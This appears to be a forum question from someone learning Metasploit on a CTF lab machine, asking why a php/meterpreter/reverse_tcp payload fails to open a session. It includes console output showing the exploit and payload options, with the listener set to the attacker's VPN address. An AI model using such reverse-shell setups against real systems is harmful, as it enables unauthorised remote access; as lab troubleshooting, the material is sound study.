Knowledge Base

Ask A Question



Can't open a Meterpreter Session by using a php/meterpreter/reverse_tcp payload

Hi, I'm learning to use Metasploit on a publicly accessible over openvpn CTF machine. I cannot get reverse shell using Metasploit, where I’m very confident that should work - people in forum confirm this. I’m running kali VirtualBox VM on Windows 7 host on laptop. I can ping and turned off windows firewall. I also tried to install everything fresh on desktop PC on Windows 10 with fresh kali VM. Did you experience similar problems or do you have any hint for me? My ifconfig: eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.x.x.x netmask ... lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet netmask ... tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500 inet 10.y.y.y netmask destination 10.y.y.y ... I know from forum I should user tun0 IP. Only one time I had meterpreter session. It was timed out. But now I can not get new session, despite all parameters are the same. I use tun interface. What could be a problem in your opinion? I tried to exploit multiple times. I did set TARGET and set PAYLOAD and set LHOST again. I reseted target machine multiple times, but no luck – no session. But the same worked - only once. I cannot understand this. Current status: msf exploit(exploit) > exploit [] Started reverse TCP handler on 10.y.y.y:4444 [] Exploit completed, but no session was created. msf exploit(exploit) > show options Module options (exploit): Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes Path to target webapp Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST targetIP yes The target address RPORT 80 yes The target port (TCP) SRVHOST 10.y.y.y yes Callback host for accepting connections SRVPORT 9000 yes Port to listen for the debugger SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.y.y.y yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name 0 Automatic There must be something else to setup. E.g. there is a remark for LHOST “an interface may be specified”. Should I make: “setg interface tun0”? Or should I somehow clean up my Metasploit? Thanks

Posted by Roman Graf about a year ago